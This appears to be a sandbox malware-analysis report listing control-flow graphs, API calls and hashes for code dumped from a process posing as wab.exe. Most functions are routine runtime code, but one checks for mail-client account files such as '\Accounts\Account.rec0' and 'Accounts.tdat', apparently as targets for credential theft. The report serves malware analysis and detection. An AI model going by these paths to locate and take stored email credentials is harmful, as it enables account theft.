                  control_flow_graph 377 20de9492-20de94ef GetConsoleCP 378 20de94f5-20de9511 377->378 379 20de9632-20de9644 call 20de2ada 377->379 380 20de952c-20de953d call 20de7c19 378->380 381 20de9513-20de952a 378->381 388 20de953f-20de9542 380->388 389 20de9563-20de9565 380->389 383 20de9566-20de9575 call 20de79e6 381->383 383->379 393 20de957b-20de959b WideCharToMultiByte 383->393 391 20de9548-20de955a call 20de79e6 388->391 392 20de9609-20de9628 388->392 389->383 391->379 400 20de9560-20de9561 391->400 392->379 393->379 395 20de95a1-20de95b7 WriteFile 393->395 397 20de962a-20de9630 GetLastError 395->397 398 20de95b9-20de95ca 395->398 397->379 398->379 399 20de95cc-20de95d0 398->399 401 20de95fe-20de9601 399->401 402 20de95d2-20de95f0 WriteFile 399->402 400->393 401->378 404 20de9607 401->404 402->397 403 20de95f2-20de95f6 402->403 403->379 405 20de95f8-20de95fb 403->405 404->379 405->401
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,20DE9C07,?,00000000,?,00000000,00000000), ref: 20DE94D4
                  • __fassign.LIBCMT ref: 20DE954F
                  • __fassign.LIBCMT ref: 20DE956A
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 20DE9590
                  • WriteFile.KERNEL32(?,?,00000000,20DE9C07,00000000,?,?,?,?,?,?,?,?,?,20DE9C07,?), ref: 20DE95AF
                  • WriteFile.KERNEL32(?,?,00000001,20DE9C07,00000000,?,?,?,?,?,?,?,?,?,20DE9C07,?), ref: 20DE95E8
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 953269cea3324c1c0a5c21b4587ee7c6554f087b3986533378b31cec02ef4c5a
                  • Instruction ID: 7147ebcabeb91b3beb1bb0fe67cc6c13e89b1bcf978f7ce1ca471ffd56bc35ac
                  • Opcode Fuzzy Hash: 953269cea3324c1c0a5c21b4587ee7c6554f087b3986533378b31cec02ef4c5a
                  • Instruction Fuzzy Hash: 4A51A071D06209AFCB01CFA9CC95AEEFBF8EF49300F14411EE959E7291D6349A41CB60

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 20de3370-20de33b5 call 20de3330 call 20de37a7 411 20de3416-20de3419 406->411 412 20de33b7-20de33c9 406->412 413 20de341b-20de3428 call 20de3790 411->413 414 20de3439-20de3442 411->414 412->414 415 20de33cb 412->415 418 20de342d-20de3436 call 20de3330 413->418 417 20de33d0-20de33e7 415->417 419 20de33fd 417->419 420 20de33e9-20de33f7 call 20de3740 417->420 418->414 421 20de3400-20de3405 419->421 427 20de340d-20de3414 420->427 428 20de33f9 420->428 421->417 425 20de3407-20de3409 421->425 425->414 429 20de340b 425->429 427->418 430 20de33fb 428->430 431 20de3443-20de344c 428->431 429->418 430->421 432 20de344e-20de3455 431->432 433 20de3486-20de3496 call 20de3774 431->433 432->433 434 20de3457-20de3466 call 20debbe0 432->434 439 20de34aa-20de34c6 call 20de3330 call 20de3758 433->439 440 20de3498-20de34a7 call 20de3790 433->440 442 20de3468-20de3480 434->442 443 20de3483 434->443 440->439 442->443 443->433
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 20DE339B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 20DE33A3
                  • _ValidateLocalCookies.LIBCMT ref: 20DE3431
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 20DE345C
                  • _ValidateLocalCookies.LIBCMT ref: 20DE34B1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 1170836740-1018135373
                  • Opcode ID: 2c135f2242531cfb057eb5abdb8212591d1ed981a2fb040de645c4f2ef90aa3c
                  • Instruction ID: d0b06a7e6e7aaa6d73a77bbbbdeb5f5995f4bf8e1cb6fc044771bb21aa86ec16
                  • Opcode Fuzzy Hash: 2c135f2242531cfb057eb5abdb8212591d1ed981a2fb040de645c4f2ef90aa3c
                  • Instruction Fuzzy Hash: 6D41DB74E022089BCB01DFE6C8C8AAEBBF5BF45224F14819DE91D9B391D735DA05CB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 20DE9221: _free.LIBCMT ref: 20DE924A
                  • _free.LIBCMT ref: 20DE92AB
                    • Part of subcall function 20DE571E: HeapFree.KERNEL32(00000000,00000000,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?), ref: 20DE5734
                    • Part of subcall function 20DE571E: GetLastError.KERNEL32(?,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?,?), ref: 20DE5746
                  • _free.LIBCMT ref: 20DE92B6
                  • _free.LIBCMT ref: 20DE92C1
                  • _free.LIBCMT ref: 20DE9315
                  • _free.LIBCMT ref: 20DE9320
                  • _free.LIBCMT ref: 20DE932B
                  • _free.LIBCMT ref: 20DE9336
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                  • Instruction ID: 86d322fbb6d4ca0eaf543a851dc4c26651173c8b54f72d9d58fe42192ca1e0af
                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                  • Instruction Fuzzy Hash: 7B117F31943B08FADA20ABF2DD47FCBBB9D9F14740FC0082DB79D76052DA24B5145661

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 488 20de8821-20de883a 489 20de883c-20de884c call 20de9341 488->489 490 20de8850-20de8855 488->490 489->490 497 20de884e 489->497 492 20de8857-20de885f 490->492 493 20de8862-20de8886 MultiByteToWideChar 490->493 492->493 495 20de888c-20de8898 493->495 496 20de8a19-20de8a2c call 20de2ada 493->496 498 20de88ec 495->498 499 20de889a-20de88ab 495->499 497->490 501 20de88ee-20de88f0 498->501 502 20de88ad-20de88bc call 20debf20 499->502 503 20de88ca-20de88db call 20de56d0 499->503 505 20de8a0e 501->505 506 20de88f6-20de8909 MultiByteToWideChar 501->506 502->505 516 20de88c2-20de88c8 502->516 503->505 513 20de88e1 503->513 510 20de8a10-20de8a17 call 20de8801 505->510 506->505 509 20de890f-20de892a call 20de5f19 506->509 509->505 520 20de8930-20de8937 509->520 510->496 517 20de88e7-20de88ea 513->517 516->517 517->501 521 20de8939-20de893e 520->521 522 20de8971-20de897d 520->522 521->510 525 20de8944-20de8946 521->525 523 20de897f-20de8990 522->523 524 20de89c9 522->524 526 20de89ab-20de89bc call 20de56d0 523->526 527 20de8992-20de89a1 call 20debf20 523->527 528 20de89cb-20de89cd 524->528 525->505 529 20de894c-20de8966 call 20de5f19 525->529 533 20de8a07-20de8a0d call 20de8801 526->533 542 20de89be 526->542 527->533 540 20de89a3-20de89a9 527->540 532 20de89cf-20de89e8 call 20de5f19 528->532 528->533 529->510 544 20de896c 529->544 532->533 546 20de89ea-20de89f1 532->546 533->505 545 20de89c4-20de89c7 540->545 542->545 544->505 545->528 547 20de8a2d-20de8a33 546->547 548 20de89f3-20de89f4 546->548 549 20de89f5-20de8a05 WideCharToMultiByte 547->549 548->549 549->533 550 20de8a35-20de8a3c call 20de8801 549->550 550->510
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,20DE6FFD,00000000,?,?,?,20DE8A72,?,?,00000100), ref: 20DE887B
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,20DE8A72,?,?,00000100,5EFC4D8B,?,?), ref: 20DE8901
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 20DE89FB
                  • __freea.LIBCMT ref: 20DE8A08
                    • Part of subcall function 20DE56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20DE5702
                  • __freea.LIBCMT ref: 20DE8A11
                  • __freea.LIBCMT ref: 20DE8A36
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 0177dbaafe2d5409a1f0d7d170a1491bf05754474a62067adb1b783845b870d6
                  • Instruction ID: 4dacdec5eb3b9a7b506256e53237b40d0e98b627b580a6729cb3c19146d61d46
                  • Opcode Fuzzy Hash: 0177dbaafe2d5409a1f0d7d170a1491bf05754474a62067adb1b783845b870d6
                  • Instruction Fuzzy Hash: C751F172A52246ABEB158FE2CC81FBB37A9EF40650F24062EFD0CD6540EB34DC5096A0
                  APIs
                  • _strlen.LIBCMT ref: 20DE1607
                  • _strcat.LIBCMT ref: 20DE161D
                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,20DE190E,?,?,00000000,?,00000000), ref: 20DE1643
                  • lstrcatW.KERNEL32(?,?), ref: 20DE165A
                  • lstrlenW.KERNEL32(?,?,?,?,?,20DE190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 20DE1661
                  • lstrcatW.KERNEL32(00001008,?), ref: 20DE1686
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrcatlstrlen$_strcat_strlen
                  • String ID:
                  • API String ID: 1922816806-0
                  • Opcode ID: cbe8e30c9bc3b932a8a638eac4d0141db55236f7481b1c1abd4bfe559c353fbd
                  • Instruction ID: f4edf44832175b1762c64a0c90b4378e6b214bd412fbfe9232fa01a1e658576d
                  • Opcode Fuzzy Hash: cbe8e30c9bc3b932a8a638eac4d0141db55236f7481b1c1abd4bfe559c353fbd
                  • Instruction Fuzzy Hash: C721C836A01204ABC7059B95DC85FEE77B8EF88714F24441EF508EB181DF74AA4587B5
                  APIs
                  • lstrcatW.KERNEL32(?,?), ref: 20DE1038
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20DE104B
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 20DE1061
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20DE1075
                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 20DE1090
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 20DE10B8
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$AttributesFilelstrcat
                  • String ID:
                  • API String ID: 3594823470-0
                  • Opcode ID: c112e6f857894c049948678fd19ec2a436b484508b3996a69fe90aac0b084619
                  • Instruction ID: 7568490811f612b457b85bc5b1891b6000ba49ad5846e411b0c7accf111dd0a3
                  • Opcode Fuzzy Hash: c112e6f857894c049948678fd19ec2a436b484508b3996a69fe90aac0b084619
                  • Instruction Fuzzy Hash: 1A21A139A013189BCF24DBA1DC48EDF3768EF44224F14469AF969931A1DE309EC5CB50
                  APIs
                  • GetLastError.KERNEL32(?,?,20DE3518,20DE23F1,20DE1F17), ref: 20DE3864
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 20DE3872
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 20DE388B
                  • SetLastError.KERNEL32(00000000,?,20DE3518,20DE23F1,20DE1F17), ref: 20DE38DD
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: 60a844d4ec3218a2a22d2445cd8e7d7e862fe3fbca14703aa2197d3e3c8bf56b
                  • Instruction ID: 6feeb86ed01f4e069e8840f5920e6cd5c77c6da3c5d521927fdc769a0db7cd24
                  • Opcode Fuzzy Hash: 60a844d4ec3218a2a22d2445cd8e7d7e862fe3fbca14703aa2197d3e3c8bf56b
                  • Instruction Fuzzy Hash: 0401713260FF115FA2041AFBACCDA662A98DB55775B25432EF51C990E1EF1A8801A264
                  APIs
                  • GetLastError.KERNEL32(?,?,20DE6C6C), ref: 20DE5AFA
                  • _free.LIBCMT ref: 20DE5B2D
                  • _free.LIBCMT ref: 20DE5B55
                  • SetLastError.KERNEL32(00000000,?,?,20DE6C6C), ref: 20DE5B62
                  • SetLastError.KERNEL32(00000000,?,?,20DE6C6C), ref: 20DE5B6E
                  • _abort.LIBCMT ref: 20DE5B74
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: b027c6db505a04c281ba9b60663bce1ecfb16243c9efe35198462363dd6a4b1e
                  • Instruction ID: ffc908e5e32905a7c0dcd5d037ed7bd12ad6e9b78ed77d1ac495fbbf256fb70c
                  • Opcode Fuzzy Hash: b027c6db505a04c281ba9b60663bce1ecfb16243c9efe35198462363dd6a4b1e
                  • Instruction Fuzzy Hash: ACF0A43650BA00ABC2022FF7AC4AF0A37699BD19E1F29012DF91CD6199FE6989025174
                  APIs
                    • Part of subcall function 20DE1E89: lstrlenW.KERNEL32(?,?,?,?,?,20DE10DF,?,?,?,00000000), ref: 20DE1E9A
                    • Part of subcall function 20DE1E89: lstrcatW.KERNEL32(?,?), ref: 20DE1EAC
                    • Part of subcall function 20DE1E89: lstrlenW.KERNEL32(?,?,20DE10DF,?,?,?,00000000), ref: 20DE1EB3
                    • Part of subcall function 20DE1E89: lstrlenW.KERNEL32(?,?,20DE10DF,?,?,?,00000000), ref: 20DE1EC8
                    • Part of subcall function 20DE1E89: lstrcatW.KERNEL32(?,20DE10DF), ref: 20DE1ED3
                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 20DE122A
                    • Part of subcall function 20DE173A: _strlen.LIBCMT ref: 20DE1855
                    • Part of subcall function 20DE173A: _strlen.LIBCMT ref: 20DE1869
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                  • API String ID: 4036392271-1520055953
                  • Opcode ID: d3f3fe3116b0f8671cd69c91bae63ca9cba214b96996c80c7b128d76bac47ace
                  • Instruction ID: 92bc56ec94350a0d6f308d1900c3e2069b0f625119f30986088e72bc7f7cced4
                  • Opcode Fuzzy Hash: d3f3fe3116b0f8671cd69c91bae63ca9cba214b96996c80c7b128d76bac47ace
                  • Instruction Fuzzy Hash: BD21E97DE11208AAE71497D1ECC2FED7339EF40B14F10054AF608EB1D0E6B11D848768
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,20DE4AEA,?,?,20DE4A8A,?,20DF2238,0000000C,20DE4BBD,00000000,00000000), ref: 20DE4B59
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 20DE4B6C
                  • FreeLibrary.KERNEL32(00000000,?,?,?,20DE4AEA,?,?,20DE4A8A,?,20DF2238,0000000C,20DE4BBD,00000000,00000000,00000001,20DE2082), ref: 20DE4B8F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: c87e1f104b0efb37e884cec18c1e8e22ed867d4b305a7a4e4bc2a34f547aa24f
                  • Instruction ID: dbc29f8e12631130a7689962d944c2f43bacec415a6da578a513f03dc4b6c3ca
                  • Opcode Fuzzy Hash: c87e1f104b0efb37e884cec18c1e8e22ed867d4b305a7a4e4bc2a34f547aa24f
                  • Instruction Fuzzy Hash: 7FF0AF31906608BFCB119F91CC48FAEBFB9EF08355F044168F909E6160DF359A41DA90
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 20DE715C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 20DE717F
                    • Part of subcall function 20DE56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20DE5702
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 20DE71A5
                  • _free.LIBCMT ref: 20DE71B8
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 20DE71C7
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: b03ed5389dd5f1bfdab0fac2ea8a08f60fae021da251816c3f993395276d23ea
                  • Instruction ID: 45f45d01b155507612c4842e7723f16819a02b1fe9c98f50eba0b70e95e0ea48
                  • Opcode Fuzzy Hash: b03ed5389dd5f1bfdab0fac2ea8a08f60fae021da251816c3f993395276d23ea
                  • Instruction Fuzzy Hash: C801A272607715BF67511AF75C8CE7B7A6DDFC29A4718016DBF08C7204EE658C0291B1
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000000,20DE636D,20DE5713,00000000,?,20DE2249,?,?,20DE1D66,00000000,?,?,00000000), ref: 20DE5B7F
                  • _free.LIBCMT ref: 20DE5BB4
                  • _free.LIBCMT ref: 20DE5BDB
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE5BE8
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20DE5BF1
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 36808fabc2ea7e0f520976903ee6125f015e26e483cda80ae9f4b745ba28f58c
                  • Instruction ID: ff1bd1199ab431b9d038f94050819faca12e3ab09c2c19dbb417b4e70b36453a
                  • Opcode Fuzzy Hash: 36808fabc2ea7e0f520976903ee6125f015e26e483cda80ae9f4b745ba28f58c
                  • Instruction Fuzzy Hash: 9801D13610BB01ABC2026FF79C85F0B2A6D9BC15F4729012DF91DD615AEE688A025170
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,20DE10DF,?,?,?,00000000), ref: 20DE1E9A
                  • lstrcatW.KERNEL32(?,?), ref: 20DE1EAC
                  • lstrlenW.KERNEL32(?,?,20DE10DF,?,?,?,00000000), ref: 20DE1EB3
                  • lstrlenW.KERNEL32(?,?,20DE10DF,?,?,?,00000000), ref: 20DE1EC8
                  • lstrcatW.KERNEL32(?,20DE10DF), ref: 20DE1ED3
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$lstrcat
                  • String ID:
                  • API String ID: 493641738-0
                  • Opcode ID: 2c9e06824f54ded3d08d7b9d50d31d69670b16148a72349fd604385359da2461
                  • Instruction ID: 1ad1d61b626713112d57512f4b59ce3a93e061e41ef495ac82c3d2a5e95e0f34
                  • Opcode Fuzzy Hash: 2c9e06824f54ded3d08d7b9d50d31d69670b16148a72349fd604385359da2461
                  • Instruction Fuzzy Hash: 77F082361066107AD625276AACC5EBF7B7CEFC6A60F18041DFA0CC31909B585D4292B5
                  APIs
                  • _free.LIBCMT ref: 20DE91D0
                    • Part of subcall function 20DE571E: HeapFree.KERNEL32(00000000,00000000,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?), ref: 20DE5734
                    • Part of subcall function 20DE571E: GetLastError.KERNEL32(?,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?,?), ref: 20DE5746
                  • _free.LIBCMT ref: 20DE91E2
                  • _free.LIBCMT ref: 20DE91F4
                  • _free.LIBCMT ref: 20DE9206
                  • _free.LIBCMT ref: 20DE9218
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 903be11192505b340c3e4a9eb1c6f60d2869a7d3b2a90bb5f52e1183a3cf893c
                  • Instruction ID: 752620609152d599d5449b7e74c0c29e802bf256fc2cd4b44ee0c6e695f9ba11
                  • Opcode Fuzzy Hash: 903be11192505b340c3e4a9eb1c6f60d2869a7d3b2a90bb5f52e1183a3cf893c
                  • Instruction Fuzzy Hash: 12F0FFB191B740A78614EFD7DAC9E1ABBD9EB10690769480DFA0DD7504CB28FC908A64
                  APIs
                  • _free.LIBCMT ref: 20DE536F
                    • Part of subcall function 20DE571E: HeapFree.KERNEL32(00000000,00000000,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?), ref: 20DE5734
                    • Part of subcall function 20DE571E: GetLastError.KERNEL32(?,?,20DE924F,?,00000000,?,00000000,?,20DE9276,?,00000007,?,?,20DE7E5A,?,?), ref: 20DE5746
                  • _free.LIBCMT ref: 20DE5381
                  • _free.LIBCMT ref: 20DE5394
                  • _free.LIBCMT ref: 20DE53A5
                  • _free.LIBCMT ref: 20DE53B6
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 3f8dab97d8747c7672228d0a2ff58afd3aa9a1bb6c48a2c318c32635a4a0764e
                  • Instruction ID: 13e32895d62c0c6c1c29bf171f35cad39fb6dd040047af332e9f805d22e5af01
                  • Opcode Fuzzy Hash: 3f8dab97d8747c7672228d0a2ff58afd3aa9a1bb6c48a2c318c32635a4a0764e
                  • Instruction Fuzzy Hash: 59F0BD70C1FB15DBC6416F65AEC95093BA1BB146D0306810EF818D7378DB3D59A1EB90
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 20DE4C1D
                  • _free.LIBCMT ref: 20DE4CE8
                  • _free.LIBCMT ref: 20DE4CF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.2670415772.0000000020DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20DE0000, based on PE: true
                  • Associated: 0000000A.00000002.2670391761.0000000020DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.2670415772.0000000020DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_20de0000_wab.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Program Files (x86)\windows mail\wab.exe
                  • API String ID: 2506810119-3377118234
                  • Opcode ID: 08c3fd20d9b15a30606c8516e9c943000f714e413fdf9f80b1936e47de272aff
                  • Instruction ID: 478df3b18901b0b906a7827dc18bd3d879820cb905fa913480128b8b07b9398d
                  • Opcode Fuzzy Hash: 08c3fd20d9b15a30606c8516e9c943000f714e413fdf9f80b1936e47de272aff
                  • Instruction Fuzzy Hash: A2317271A07608AFD711CFDA8D85A9EBBFCEF88350B25805EF90897210D674AA41DB60
                  APIs
